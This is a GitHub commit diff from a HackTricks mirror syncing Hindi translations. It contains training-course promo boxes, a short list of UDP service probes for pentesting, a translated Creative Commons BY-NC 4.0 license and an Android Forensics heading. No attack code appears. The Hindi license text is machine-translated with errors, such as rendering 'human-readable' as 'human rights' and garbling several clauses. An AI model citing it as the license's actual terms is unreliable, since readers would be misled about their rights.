mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md
This commit is contained in:
parent
4f81b7b6f8
commit
78ec4f6652
94 changed files with 3431 additions and 3241 deletions
|
@ -1,30 +1,31 @@
|
|||
# 1911 - Pentesting fox
|
||||
# 1911 - पेंटेस्टिंग फॉक्स
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर [**@carlospolopm**](https://twitter.com/carlospolopm) पर **फॉलो करें**.
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में PR जमा करके।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
और अधिक सेवाएं:
|
||||
|
||||
ubiquiti-discover udp "Ubiquiti Networks Device"
|
||||
ubiquiti-discover udp "Ubiquiti Networks डिवाइस"
|
||||
|
||||
dht udp "DHT Nodes"
|
||||
dht udp "DHT नोड्स"
|
||||
|
||||
5060 udp sip "SIP/"
|
||||
|
||||
![](<.gitbook/assets/image (273).png>)
|
||||
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
|
||||
|
||||
InfluxDB
|
||||
|
||||
|
@ -38,16 +39,17 @@ InfluxDB
|
|||
|
||||
![](<.gitbook/assets/image (341).png>)
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर [**@carlospolopm**](https://twitter.com/carlospolopm) पर **फॉलो करें**.
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) **और हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में PR जमा करके।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स **शेयर करें**.
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
90
LICENSE.md
90
LICENSE.md
|
@ -1,60 +1,88 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
|
||||
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter पर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें.**
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<a rel="license" href="https://creativecommons.org/licenses/by-nc/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://licensebuttons.net/l/by-nc/4.0/88x31.png" /></a><br>कॉपीराइट © Carlos Polop 2021. जहां अन्यथा निर्दिष्ट (पुस्तक में कॉपी की गई बाहरी जानकारी मूल लेखकों की है), <a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a> पर Carlos Polop द्वारा लिखित पाठ <a href="https://creativecommons.org/licenses/by-nc/4.0/">Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)</a> के तहत लाइसेंस प्राप्त है।
|
||||
|
||||
लाइसेंस: Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)<br>
|
||||
मानव पठनीय लाइसेंस: https://creativecommons.org/licenses/by-nc/4.0/<br>
|
||||
<a rel="license" href="https://creativecommons.org/licenses/by-nc/4.0/"><img alt="क्रिएटिव कॉमन्स लाइसेंस" style="border-width:0" src="https://licensebuttons.net/l/by-nc/4.0/88x31.png" /></a><br>कॉपीराइट © कार्लोस पोलोप 2021। जहाँ अन्यथा निर्दिष्ट किया गया हो (पुस्तक में कॉपी किए गए बाह्य सूचनाएं मूल लेखकों की संपत्ति है), [**हैक ट्रिक्स**](https://github.com/carlospolop/hacktricks) के लेखक कार्लोस पोलोप द्वारा लाइसेंस दिया गया है अधिकारिक क्रिएटिव कॉमन्स एट्रिब्यूशन-नॉनकमर्शियल 4.0 इंटरनेशनल (सीसी बाई-एनसी 4.0) के तहत।
|
||||
|
||||
लाइसेंस: एट्रिब्यूशन-नॉनकमर्शियल 4.0 इंटरनेशनल (सीसी बाई-एनसी 4.0)<br>
|
||||
मानव अधिकार लाइसेंस: https://creativecommons.org/licenses/by-nc/4.0/<br>
|
||||
पूर्ण कानूनी शर्तें: https://creativecommons.org/licenses/by-nc/4.0/legalcode<br>
|
||||
फॉर्मेटिंग: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
|
||||
स्वरूपण: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
|
||||
## खंड 2 – दायरा।
|
||||
|
||||
# creative commons
|
||||
a. ___लाइसेंस अनुमति।___
|
||||
|
||||
# Attribution-NonCommercial 4.0 International
|
||||
1. इस सार्वजनिक लाइसेंस की शर्तों और स्थितियों के अधीन, लाइसेंसर यहाँ आपको एक वैश्विक, रॉयल्टी-मुक्त, गैर-सबलाइसेंसेबल, गैर-अनन्य, अप्रत्याशित लाइसेंस प्रदान करता है जिसके अंतर्गत आपको लाइसेंस प्राप्त सामग्री में लाइसेंसिंग अधिकार का प्रयोग करने की अनिवार्य अनुमति है:
|
||||
|
||||
Creative Commons Corporation (“Creative Commons”) कोई कानूनी फर्म नहीं है और वह कानूनी सेवाएं या कानूनी सलाह प्रदान नहीं करता है। Creative Commons सार्वजनिक लाइसेंसों का वितरण किसी वकील-ग्राहक या अन्य संबंध का निर्माण नहीं करता है। Creative Commons अपने लाइसेंस और संबंधित जानकारी "जैसी है" आधार पर उपलब्ध कराता है। Creative Commons अपने लाइसेंसों, किसी भी सामग्री जो उनकी शर्तों और शर्तों के तहत लाइसेंस प्राप्त है, या किसी भी संबंधित जानकारी के बारे में कोई वारंटी नहीं देता है। Creative Commons उनके उपयोग से होने वाली किसी भी क्षति के लिए सभी दायित्वों से इनकार करता है।
|
||||
A. केवल गैर-वाणिज्यिक उद्देश्यों के लिए, पूरी या अंशदारी लाइसेंसिंग सामग्री को पुनर्उत्पादित और साझा करना; और
|
||||
|
||||
## Creative Commons Public Licenses का उपयोग करना
|
||||
B. गैर-वाणिज्यिक उद्देश्यों के लिए सिर्फ उत्पादित, पुनर्उत्पादित और साझा किया गया सामग्री को साझा करना।
|
||||
|
||||
Creative Commons सार्वजनिक लाइसेंस एक मानक सेट प्रदान करते हैं जिसे रचनाकार और अन्य अधिकार धारक कॉपीराइट और कुछ अन्य अधिकारों द्वारा संरक्षित सामग्री को साझा करने के लिए उपयोग कर सकते हैं। निम्नलिखित विचार केवल सूचनात्मक उद्देश्यों के लिए हैं, समाप्त नहीं हैं, और हमारे लाइसेंसों का हिस्सा नहीं बनते हैं।
|
||||
2. __अपवाद और सीमाएँ।__ स्पष्टता के लिए, जहाँ अपवाद और सीमाएँ आपके उपयोग पर लागू होती हैं, इस सार्वजनिक लाइसेंस का अनुपालन नहीं होता है, और आपको इसकी शर्तों और स्थितियों का पालन करने की आवश्यकता नहीं है।
|
||||
|
||||
* __लाइसेंस देने वालों के लिए विचार:__ हमारे सार्वजनिक लाइसेंस उन लोगों द्वारा उपयोग के लिए इरादा हैं जो सामग्री को कॉपीराइट और कुछ अन्य अधिकारों द्वारा अन्यथा प्रतिबंधित तरीकों में उपयोग करने के लिए सार्वजनिक अनुमति देने के लिए अधिकृत हैं। हमारे लाइसेंस अपरिवर्तनीय हैं। लाइसेंस देने वालों को इसे लागू करने से पहले वे चुने गए लाइसेंस की शर्तों और शर्तों को पढ़ना और समझना चाहिए। लाइसेंस देने वालों को यह भी सुनिश्चित करना चाहिए कि वे हमारे लाइसेंस लागू करने से पहले सभी आवश्यक अधिकारों को सुरक्षित करें ताकि सार्वजनिक रूप से सामग्री का पुन: उपयोग कर सकें। लाइसेंस देने वालों को उस सामग्री को स्पष्ट रूप से चिह्नित करना चाहिए जो लाइसेंस के अधीन नहीं है। इसमें अन्य CC-लाइसेंस प्राप्त सामग्री, या कॉपीराइट के अपवाद या सीमा के तहत उपयोग की गई सामग्री शामिल है। [लाइसेंस देने वालों के लिए अधिक विचार](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors).
|
||||
3. __अवधि।__ इस सार्वजनिक लाइसेंस की अवधि खंड 6(a) में निर्दिष्ट की गई है।
|
||||
|
||||
* __सार्वजनिक के लिए विचार:__ हमारे सार्वजनिक लाइसेंसों में से एक का उपयोग करके, एक लाइसेंस देने वाला सार्वजनिक को निर्दिष्ट शर्तों और शर्तों के तहत लाइसेंस प्राप्त सामग्री का उपयोग करने की अनुमति देता है। यदि किसी भी कारण से लाइसेंस देने वाले की अनुमति आवश्यक नहीं है–उदाहरण के लिए, कॉपीराइट के किसी भी लागू अपवाद या सीमा के कारण–तो वह उपयोग लाइसेंस द्वारा विनियमित नहीं है। हमारे लाइसेंस केवल कॉपीराइट और कुछ अन्य अधिकारों के तहत अनुमतियां प्रदान करते हैं जिन्हें लाइसेंस देने वाला अनुदान देने का अधिकार रखता है। लाइसेंस प्राप्त सामग्री का उपयोग अन्य कारणों से भी प्रतिबंधित हो सकता है, जिसमें यह भी शामिल है कि अन्य लोगों के पास सामग्री में कॉपीराइट या अन्य अधिकार हो सकते हैं। एक लाइसेंस देने वाला विशेष अनुरोध कर सकता है, जैसे कि सभी परिवर्तनों को चिह्नित या वर्णित करने का अनुरोध करना। हालांकि हमारे लाइसेंसों द्वारा आवश्यक नहीं है, आपको उचित होने पर उन अनुरोधों का सम्मान करने की सलाह दी जाती है। [सार्वजनिक के लिए अधिक विचार](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees).
|
||||
4. __मीडिया और प्रारूप; तकनीकी संशोधन अनुमत है।__ लाइसेंसर आपको सभी मीडिया और प्रारूपों में लाइसेंसिंग अधिकार का प्रयोग करने की अनुमति देता है चाहे वे अभी जाने वाले हों या भविष्य में बनाए गए हों, और तकनीकी संशोधन करने की आवश्यकता हो। लाइसेंसर ने यह अधिकार वापस लेने या आपको तकनीकी संशोधन करने से रोकने का कोई अधिकार या अधिकार दावा करने का कोई अधिकार नहीं देने का सहमति दी है। इस सार्वजनिक लाइसेंस के लिए, इस खंड 2(a)(4) द्वारा अधिकृत संशोधन करना कभी भी उत्पादित सामग्री नहीं उत्पन्न करता।
|
||||
|
||||
# Creative Commons Attribution-NonCommercial 4.0 International Public License
|
||||
5. __निचले प्राप्तकर्ता।__
|
||||
|
||||
लाइसेंस प्राप्त अधिकारों (नीचे परिभाषित) का अभ्यास करके, आप इस Creative Commons Attribution-NonCommercial 4.0 International Public License ("Public License") की शर्तों और शर्तों से बंधे होने के लिए सहमत होते हैं। इस Public License को एक अनुबंध के रूप में व्याख्या की जा सकती है, आपको इन शर्तों और शर्तों की स्वीकृति के विचार में लाइसेंस प्राप्त अधिकार दिए जाते हैं, और लाइसेंस देने वाला आपको इन शर्तों और शर्तों के तहत लाइसेंस प्राप्त सामग्री उपलब्ध कराने से प्राप्त लाभों के विचार में ऐसे अधिकार देता है।
|
||||
A. __लाइसेंसर से प्रस्ताव – लाइसेंसिंग सामग्री।__ लाइसेंसिंग सामग्री के प्रत्येक प्राप्तकर्ता को स्वचालित रूप से लाइसेंसर से एक प्रस्ताव प्राप्त होता है जिसके अंतर्गत वे इस सार्वजनिक लाइसेंस की शर्तों और स्थितियों के अनुसार लाइसेंसिंग अधिकार का प्रयोग कर सकते हैं।
|
||||
|
||||
## धारा 1 – परिभाषाएँ।
|
||||
B. __कोई निचले प्रतिबंध नहीं।__ यदि आप लाइसेंसिंग सामग्री का प्रयोग करने वाले किसी प्राप्तकर्ता के द्वारा लाइसेंसिंग अधिकार का प्रयोग करने में रोक लगाते हैं, तो आप किसी भी अतिरिक्त या विभिन्न शर्तों या स्थितियों का प्रस्ताव नहीं कर सकते।
|
||||
|
||||
a. __अनुकूलित सामग्री__ का अर्थ है कॉपीराइट और समान अधिकारों के अधीन सामग्री जो लाइसेंस प्राप्त सामग्री से व्युत्पन्न होती है या उसके आधार पर होती है
|
||||
6. __कोई समर्थन नहीं।__ इस सार्वजनिक लाइसेंस में कुछ भी नहीं है जो यह सिद्ध करने या इसे इस सार्वजनिक लाइसेंस के अंतर्गत आपका उपयोग, या लाइसेंसर या अन्य व्यक्ति जिन्हें धारात्मक रूप से प्राप्त किया जाता है, से जुड़ा है, या समर्थित, या आधिकृत रूप से दिया गया है, के साथ जोड़ सकता है।
|
||||
|
||||
b. ___अन्य अधिकार।___
|
||||
|
||||
1. नैतिक अधिकार, जैसे सत्यापन का अधिकार, इस सार्वजनिक लाइसेंस के अंतर्गत लाइसेंस नहीं हैं, न कि प्रचार, गोपनीयता, और/या अन्य समकक्ष व्यक्तित्व अधिकार; हालांकि, जितना संभव हो, लाइसेंसर ने ऐसे अधिकारों का असर न करने या अनुसार करने के लिए जो लाइसेंसर द्वारा धारित किए जाते हैं, उस सीमा तक आपको अनुमति देने या अनुसार करने की सहमति दी है, लेकिन अन्यथा नहीं।
|
||||
|
||||
2. पेटेंट और ट्रेडमार्क अधिकार इस सार्वजनिक लाइसेंस के अंतर्गत लाइसेंस नहीं हैं।
|
||||
|
||||
3. जितना संभव हो, लाइसेंसर ने आपसे लाइसेंसिंग अधिकार का प्रयोग करने के लिए आपसे राजस्व वसूलने का कोई अधिकार नहीं है, सीधे या किसी भी स्वेच्छिक या वायव्यक्तिक लाइसेंसिंग योजना के तहत किसी संग्रहण समिति के माध्यम से। अन्य सभी मामलों में लाइसेंसर व्यक्तिगत उद्देश्यों के लिए लाइसेंसिंग सामग्री का उपयोग किया जाता है, तो लाइसेंसर व्यक्तिगत रूप से ऐसे राजस्व वसूलने का कोई अधिकार सुरक्षित रखता है, जिसमें शामिल है जब लाइसेंसिंग सामग्री का गैर-वाणिज्यिक उद्देश्यों के लिए उपयोग किया जाता है।
|
||||
## खंड 7 - अन्य शर्तें और नियम।
|
||||
|
||||
a. लाइसेंसदाता को आप द्वारा संचारित किसी भी अतिरिक्त या विभिन्न शर्तों या नियमों से बाँधा नहीं जाएगा जब तक व्यक्तिगत रूप से सहमति न हो।
|
||||
|
||||
b. लाइसेंस प्राप्त सामग्री के बारे में किसी भी व्यवस्थाओं, समझौतों या समझौतों के बारे में जो इसमें उल्लिखित नहीं हैं, वे इस सार्वजनिक लाइसेंस के नियमों और शर्तों से अलग हैं।
|
||||
|
||||
## खंड 8 - व्याख्या।
|
||||
|
||||
a. स्पष्टीकरण के लिए, यह सार्वजनिक लाइसेंस किसी भी लाइसेंस प्राप्त सामग्री के किसी भी उपयोग पर किसी अनुमति के बिना किया जा सकता है, नहीं करेगा, और नहीं व्याख्या किया जाएगा।
|
||||
|
||||
b. जितना संभव हो, यदि इस सार्वजनिक लाइसेंस का कोई प्रावधान अमान्य माना जाता है, तो इसे इसे कार्यान्वित करने के लिए आवश्यक न्यूनतम सीमा तक स्वचालित रूप से सुधारा जाएगा। यदि प्रावधान को सुधारा नहीं जा सकता है, तो यह सार्वजनिक लाइसेंस से अलग कर दिया जाएगा बिना बाकी नियमों और शर्तों की कार्यान्वितता पर कोई प्रभाव डाले।
|
||||
|
||||
c. इस सार्वजनिक लाइसेंस का कोई भी शर्त या नियम माफ़ नहीं किया जाएगा और कोई भी अवहेलना की अनुमति नहीं दी जाएगी जब तक लाइसेंसदाता द्वारा स्पष्ट रूप से सहमति न हो।
|
||||
|
||||
d. इस सार्वजनिक लाइसेंस में कुछ भी नहीं है जो लाइसेंसदाता या आप पर लागू होने वाली किसी भी विशेषाधिकार और शासनाधिकारों की किसी सीमा के रूप में या इससे विवादित रूप से व्याख्या की जा सकती है।
|
||||
```
|
||||
Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses.
|
||||
|
||||
Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/).
|
||||
```
|
||||
{% hint style="success" %}
|
||||
**एडब्ल्यूएस हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण एडब्ल्यूएस रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)
|
||||
|
||||
**जीसीपी हैकिंग सीखें और अभ्यास करें:** [**HackTricks प्रशिक्षण जीसीपी रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में पीआर जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,51 +1,53 @@
|
|||
# Android Forensics
|
||||
# एंड्रॉइड फोरेंसिक्स
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
